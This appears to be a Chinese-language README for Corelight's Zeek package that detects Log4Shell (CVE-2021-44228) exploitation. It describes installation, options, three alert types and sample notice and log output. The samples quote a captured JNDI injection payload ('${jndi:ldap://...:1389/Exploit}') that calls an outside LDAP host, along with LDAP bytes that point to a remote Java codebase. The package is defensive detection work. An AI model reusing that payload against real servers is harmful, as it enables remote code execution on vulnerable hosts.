## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CORELIGHT-CVE-2021-44228
# CVE-2021-44228
一个 Zeek 软件包,用于对 Log4J(CVE-2021-44228)利用尝试发出告警、标记 HTTP 连接,并可选地生成日志。
* 检测 HTTP 标头中包含的载荷:详见 检测 Log4Shell 的简化方法 的 说明。
* 使用 Zeek 签名 在 LDAP 搜索期间返回 Java 文件时生成告警。详见 通过 Zeek 与 LDAP 流量检测 Log4j 的 说明。
* 检测第二阶段的 Java 类何时被下载,无论载荷和第一阶段检测情况如何。详见 通过 Zeek 检测 Java 下载 Java 时的 Log4j 利用 的说明。
## 安装
`$ zkg install cve-2021-44228`
对已有的 pcap 文件使用:
`$ zeek -Cr scripts/__load__.zeek your.pcap`
如果您从 `git clone` 克隆的仓库版本安装,请注意它默认使用开发分支。请从 `master` 分支或某个发布版本安装,以获得更稳定的软件包版本。
## 选项和说明:
* `CVE_2021_44228::log` 决定是否生成 `log4j` 日志。默认为 `T`。
* `CVE_2021_44228::ignorable_target_hosts` 是一组可忽略的 `target_host`。它是 `set[string]` 类型,因此 IP 和域名都可以被忽略。
* `CVE_2021_44228::ignorable_orig_hosts` 是一组来自已知良性扫描器、可被忽略的 `addr`。
* `CVE_2021_44228::ignorable_resp_hosts` 同上,但针对 `resp`。
* `CVE_2021_44228::try_normalize` 决定是否应尝试对载荷进行规范化。默认为 `T`。
## 示例告警
该软件包生成三种不同的告警:
1. `LOG4J_ATTEMPT_HEADER`
2. `LOG4J_LDAP_JAVA`
3. `LOG4J_JAVA_CLASS_DOWNLOAD`
`LOG4J_ATTEMPT_HEADER` 根据 HTTP 标头数据标记潜在的攻击尝试。如果启用了日志,这些尝试也会记录到 `log4j` 日志中。
root@kitploit:~
#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path notice
#open 2021-12-14-11-50-29
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude
#types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double
1639350256.733555 Cp7gaS3nVqVl49obpb 154.65.28.250 57932 172.16.4.58 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Bearer ${jndi:ldap://45.83.193.150:1389/Exploit}' 154.65.28.250 172.16.4.58 80 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - -
#close 2021-12-14-11-50-29
`LOG4J_LDAP_JAVA` 检测通过 LDAP 下载 Java 字节码的行为。在实践中,我们发现这种情况出现频率足够低,因此它可以作为可能成功利用的一个良好的代理检测指标。
root@kitploit:~
#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path notice
#open 2021-12-16-20-54-13
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude
#types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double
1639425815.885952 ClEkJM2Vm5giqnMf4h 172.16.238.10 57650 172.16.238.11 1389 - - - tcp Signatures::Sensitive_Signature 172.16.238.11: log4j_javaclassname_tcp 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07... 172.16.238.11 172.16.238.10 1389 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - -
1639425815.885952 ClEkJM2Vm5giqnMf4h 172.16.238.10 57650 172.16.238.11 1389 - - - tcp CVE_2021_44228::LOG4J_LDAP_JAVA Possible Log4j exploit CVE-2021-44228 exploit, JAVA over LDAP. Refer to sub field for sample of payload. 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07Exploit 172.16.238.10 172.16.238.11 1389 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - -
1639425834.635341 CUM0KZ3MLUfNB0cl11 172.16.238.10 57742 172.16.238.11 1389 - - - tcp Signatures::Sensitive_Signature 172.16.238.11: log4j_javaclassname_tcp 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07... 172.16.238.11 172.16.238.10 1389 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - -
#close 2021-12-16-20-54-13
最后,`LOG4J_JAVA_CLASS_DOWNLOAD` 在我们确信 Java 下载了更多 Java 代码时生成告警。如上所述,这种情况出现得足够少,因此是一个有用的代理检测指标。
root@kitploit:~
#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path notice
#open XXXX-XX-XX-XX-XX-XX
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude
#types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double
XXXXXXXXXX.XXXXXX C4J4Th3PJpwUYZZ6gc 172.16.238.10 48444 172.16.238.11 80 - - - tcp CVE_2021_44228::LOG4J_JAVA_CLASS_DOWNLOAD Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type user_agent='Java/1.8.0_51', CONTENT-TYPE='application/java-vm', host='172.16.238.11' 172.16.238.10 172.16.238.11 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - -
XXXXXXXXXX.XXXXXX CmES5u32sYpV7JYN 172.16.238.10 48534 172.16.238.11 80 - - - tcp CVE_2021_44228::LOG4J_JAVA_CLASS_DOWNLOAD Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type user_agent='Java/1.8.0_51', CONTENT-TYPE='application/java-vm', host='172.16.238.11' 172.16.238.10 172.16.238.11 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - -
#close 2021-12-126-19-17-58
## 示例日志(`log4j.log`)
root@kitploit:~
#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path log4j
#open 2021-12-14-11-50-29
#fields ts uid http_uri uri stem target_host target_port method is_orig name value matched_name matched_value
#types time string string string string string string string bool string string bool bool
1639350256.733555 Cp7gaS3nVqVl49obpb / 45.83.193.150:1389/Exploit 45.83.193.150:1389 45.83.193.150 1389 GET T AUTHORIZATION Bearer ${jndi:ldap://45.83.193.150:1389/Exploit} F T
#close 2021-12-14-11-50-29
## 参考资料
1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228
2. https://corelight.com/blog/simplifying-detection-of-log4shell